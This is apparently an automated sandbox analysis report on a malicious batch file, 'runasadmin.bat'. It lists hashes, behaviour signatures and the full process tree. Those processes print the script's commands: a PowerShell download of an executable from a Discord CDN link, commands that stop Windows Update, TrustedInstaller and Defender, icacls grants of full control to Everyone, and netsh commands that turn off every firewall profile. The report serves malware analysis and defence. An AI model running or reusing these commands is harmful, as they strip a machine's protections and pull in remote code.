Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 17:43
Static task
static1
General
-
Target
runasadmin.bat
-
Size
1KB
-
MD5
8c6d25434d4d9d6c230a727a90b3e111
-
SHA1
bb21e80767f6c2f6fcc382eeb0c67afc7294dae9
-
SHA256
61d3ded7796d8e1e237a9d5b29dfa3c85bd8a7b0851158683b7182c8693efc5f
-
SHA512
a9f81718046624aaf8c391e390dba81250f6c346e9aec4e929ca6a60eaecac5928ec961df91b2c520fa99b50481b8310192d8576cf1e20cb0d4129b8aadc194c
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 7 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 5016 netsh.exe 4904 netsh.exe 1712 netsh.exe 2308 netsh.exe 2780 netsh.exe 4268 netsh.exe 1444 netsh.exe -
Possible privilege escalation attempt 3 IoCs
Processes:
icacls.exeicacls.exetakeown.exepid process 4672 icacls.exe 4652 icacls.exe 2636 takeown.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
takeown.exeicacls.exeicacls.exepid process 2636 takeown.exe 4672 icacls.exe 4652 icacls.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 4104 sc.exe 4628 sc.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4368 timeout.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1956 powershell.exe 1956 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1956 powershell.exe -
Suspicious use of WriteProcessMemory 44 IoCs
Processes:
cmd.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1100 wrote to memory of 1956 1100 cmd.exe powershell.exe PID 1100 wrote to memory of 1956 1100 cmd.exe powershell.exe PID 1100 wrote to memory of 4104 1100 cmd.exe sc.exe PID 1100 wrote to memory of 4104 1100 cmd.exe sc.exe PID 1100 wrote to memory of 4628 1100 cmd.exe sc.exe PID 1100 wrote to memory of 4628 1100 cmd.exe sc.exe PID 1100 wrote to memory of 3504 1100 cmd.exe net.exe PID 1100 wrote to memory of 3504 1100 cmd.exe net.exe PID 3504 wrote to memory of 4952 3504 net.exe net1.exe PID 3504 wrote to memory of 4952 3504 net.exe net1.exe PID 1100 wrote to memory of 1760 1100 cmd.exe net.exe PID 1100 wrote to memory of 1760 1100 cmd.exe net.exe PID 1760 wrote to memory of 3980 1760 net.exe net1.exe PID 1760 wrote to memory of 3980 1760 net.exe net1.exe PID 1100 wrote to memory of 2636 1100 cmd.exe takeown.exe PID 1100 wrote to memory of 2636 1100 cmd.exe takeown.exe PID 1100 wrote to memory of 4672 1100 cmd.exe icacls.exe PID 1100 wrote to memory of 4672 1100 cmd.exe icacls.exe PID 1100 wrote to memory of 4652 1100 cmd.exe icacls.exe PID 1100 wrote to memory of 4652 1100 cmd.exe icacls.exe PID 1100 wrote to memory of 3420 1100 cmd.exe net.exe PID 1100 wrote to memory of 3420 1100 cmd.exe net.exe PID 3420 wrote to memory of 2692 3420 net.exe net1.exe PID 3420 wrote to memory of 2692 3420 net.exe net1.exe PID 1100 wrote to memory of 2732 1100 cmd.exe net.exe PID 1100 wrote to memory of 2732 1100 cmd.exe net.exe PID 2732 wrote to memory of 2552 2732 net.exe net1.exe PID 2732 wrote to memory of 2552 2732 net.exe net1.exe PID 1100 wrote to memory of 2308 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 2308 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 2780 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 2780 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 4268 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 4268 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 1444 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 1444 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 5016 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 5016 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 4904 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 4904 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 1712 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 1712 1100 cmd.exe netsh.exe PID 1100 wrote to memory of 4368 1100 cmd.exe timeout.exe PID 1100 wrote to memory of 4368 1100 cmd.exe timeout.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\runasadmin.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1239070337228865601/1242889939524259870/shutdown.exe?ex=664f7af5&is=664e2975&hm=8334727a2bec5b610b6e37fcf28e25d2d51052e173836b06f92cce2cff19e593& -OutFile C:\shutdown.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exesc config "wuauserv" start= disabled2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc config "TrustedInstaller" start= disabled2⤵
- Launches sc.exe
-
C:\Windows\system32\net.exenet stop wuauserv2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wuauserv3⤵
-
C:\Windows\system32\net.exenet stop TrustedInstaller2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrustedInstaller3⤵
-
C:\Windows\system32\takeown.exetakeown /F C:\X\Y\Z /A /R2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\X\Y\Z /grant Everyone:F /T2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls . /grant Everyone:F /T /C /Q2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\net.exenet stop "Windows Defender Service"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Windows Defender Service"3⤵
-
C:\Windows\system32\net.exenet stop "Windows Firewall"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Windows Firewall"3⤵
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\timeout.exetimeout /t 1 /nobreak2⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5cdywult.iq3.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1956-0-0x00007FFCAA423000-0x00007FFCAA425000-memory.dmpFilesize
8KB
-
memory/1956-1-0x000001F8CE6E0000-0x000001F8CE702000-memory.dmpFilesize
136KB
-
memory/1956-11-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmpFilesize
10.8MB
-
memory/1956-12-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmpFilesize
10.8MB
-
memory/1956-15-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmpFilesize
10.8MB
-
memory/1956-16-0x00007FFCAA420000-0x00007FFCAAEE1000-memory.dmpFilesize
10.8MB